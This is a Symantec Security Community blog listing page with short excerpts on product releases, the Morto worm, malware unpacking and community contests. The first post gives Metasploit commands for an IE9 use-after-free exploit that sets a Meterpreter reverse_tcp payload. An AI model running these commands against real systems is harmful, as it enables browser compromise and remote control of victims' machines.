Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Community Blog
Showing posts tagged with Critical System Protection
Showing posts in English
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Beverly van de Velde | 29 Mar 2012 | 0 comments

Education Enablement Services is developing a Symantec Cloud Security Essentials course that combines the CSA training in order to achieve the CCSK credential & a Symantec Certified Professional (SCP) in Cloud Security credential. 

This is an open call for your experiences with reviewing, designing, or implementing security solutions in a cloud environment.  These could come from situations unique to the cloud (ex. compliance issues for systems in a public cloud) - OR - general security solutions addressed in cloud environments (ex. how existing encryption policies were applied to a cloud architecture). 

We need your:
• Specific examples of security solutions in cloud environments
• Example cloud architectures – good or bad – implemented by customers
• Key questions, challenges, and concerns from customers migrating their infrastructure to...

rscovel | 19 Dec 2011 | 4 comments

Symantec Protection Center 2.1 (SPC) has been released!

The Symantec Protection Center Team is proud to announce the release of Symantec Protection Center 2.1 (2.1.0.2075), which was published today to the LiveUpdate Publishing Service.  SPC 2.0 Customers will be notified that an update to SPC is available for download.  This is a LiveUpdate release only.  This update provides fixes for a small number of defects, as well as several major enhancements.

These enhancements include:

  • New Security Audit functionality, and reports
  • New Intrusion Detection System (IDS) signature reports
  • An enhanced Specific Endpoint report
  • SPC Web Interface security certificate management
  • Updated browser compatibility

Full details are found in the SPC 2.1 Release notes (DOC4967...

Stuart_Hawkins | 16 Dec 2011 | 0 comments

Many organizations are using Critical System Protection to monitor system activity and alert if and when a host has been compromised. As the attacks to servers become more sophisticated, it’s becoming more important for organizations to block malicious activity automatically - whether the attack originates from internal or external parties - to prevent further incursion of their environment.

What has prevented a number of customers from moving to host IPS is the fear of false positives, and what impact the prevention may have on the applications or server workloads being supported.

With the most recent release of Critical System Protection customers are now able to selectively enable prevention policies without the fear of stopping critical business processes.

Targeted Prevention Policy (available in the...

Dinesh Theerthagiri | 17 Nov 2011 | 1 comment

This article presents information on manual unpacking of protected malicious Windows executables using the OllyDbg debugger. It also involve in fully rebuild the import table so the file can be restored to its original state and executed. Many anti-virus vendors categorized UPX, NsPack, ASpack and many other PE packers as malicious software.

Packers ???

A 'Packer' is a compression routine that squeezes an executable file. These programs created to reduce disk space and make downloads faster. It makes difficult to understand the original file and make it tricky to match the file signature of a compressed file. Packers initially send PE internal structures and then it identifies PE header, Export table, and import table in new structures & attaches code segment before OEP, called as STUB .i.e. the compressed executable is shifted to data section of newly created file. PE header & section header is no more useful since data is compressed means...

rscovel | 25 Oct 2011 | 0 comments

The Protection Center Team is proud to announce the release of Symantec Protection Center 2.0 Release Update 1 (SPC RU1), which was published today to the LiveUpdate Publishing Service.  SPC 2.0 Customers will be notified that an update to SPC is available for download.  This is a LiveUpdate release only.  This update provides fixes for a small number of defects and also the ability for SPC customers with Symantec Web Gateway (SWG) 5.0.2 (and later) and Symantec Critical Systems Protection (CSP) 5.2.8 (and later) applications to integrate with the SPC Dashboard. 

Symantec Protection Center is a centralized security management console that enables organizations to identify emerging threats, prioritize tasks and accelerate time to protection based on relevant, actionable intelligence. Through a combination of process automation and security intelligence, it enables users to take timely, targeted action to remediate incidents and proactively...

Brandon Noble | 01 Sep 2011 | 0 comments

Over the weekend, Microsoft and F-secure issued warnings about a new global threat called “Morto”, and The Internet Storm Center has been seeing a large spike in traffic on Port 3389.

The spike looks to have been caused by the RDP (Remote Desktop) portion of the worm calling around looking for RDP connections. Once it finds one, it uses a small list of weak passwords and  ..pwnage ensues.

Symantec detects this threat as W32.Morto and Security Response and will continue to perform deeper analysis throughout the next several days. So far, they have uncovered several dozen different MD5s that are all part of this same threat family.

Signs of Morto in your environment

As we learned with W32.Downadup:
Brute force attacks + Small list of passwords = Account lockouts.

As with any...

SecuredThatToo | 17 Feb 2011 | 1 comment

Symantec just announced a pretty cool, interactive, free tool to help stay abreast of security trends and activities.  It even has historical data!  There’s an online version, a installable Windows gadget and you can access it via your mobile phone!  It's pretty slick!

Online Web Portal:
http://www.nortoncybercrimeindex.com

Windows Gadget Download:
http://www.norton.com/ProtectYourself

Mobile:
http://www.nortoncybercrimeindex.mobi

Check it out!!!

Thanks,
Min Ju

Hear4U | 08 Sep 2010

Here's your chance to be "King for a Week" with our new Security Solutions Contest! 

What Is the Security Solutions Contest?
It's all about solving end user questions in the forums area.  We created this contest to help increase the total number of solutions on the Security Community.  We are going to select threads we'd like you to solve, and give you an opportunity to win a weekly prize. Yes, I said "weekly!"  Keep reading to find out more about the prize!

How Do I Participate?
First, if you want to play, pull out your dust-ridden, coffee stained endpoint protection & related security product manuals, re-read all the latest and greatest knowledge base articles, and put your thinking-caps on! 

Why?  Because to be the "King for a Week" in this contest, you need to be able to solve popular forum threads that will be hand...

Hear4U | 30 Aug 2010 | 0 comments

Threat of cybercrime grows across the globe

Cybercrime is a growing concern for SMBs and individuals around the world. As part of National Cyber Security Awareness Week, an initiative of the Australian Government, a Symantec survey revealed that 56 percent of SMBs in Australia were affected by cybercrime in 2009, up 10 percent from 2008. While increases in both the amount and complexity of attacks are to blame, the change can also be attributed to the decline in IT budgets over the past year.

To fight this growing international trend, governments have gotten involved. The Mexican Senate recently passed the Federal Data Protection Act, a new law on data protection that will levy penalties up to $1.5 million for violators of the law. Jurisdiction for the country’s Federal Institute of Access to Information and Data Protection will expand to cover the protection of personal information of private individuals and entities, helping to guarantee data...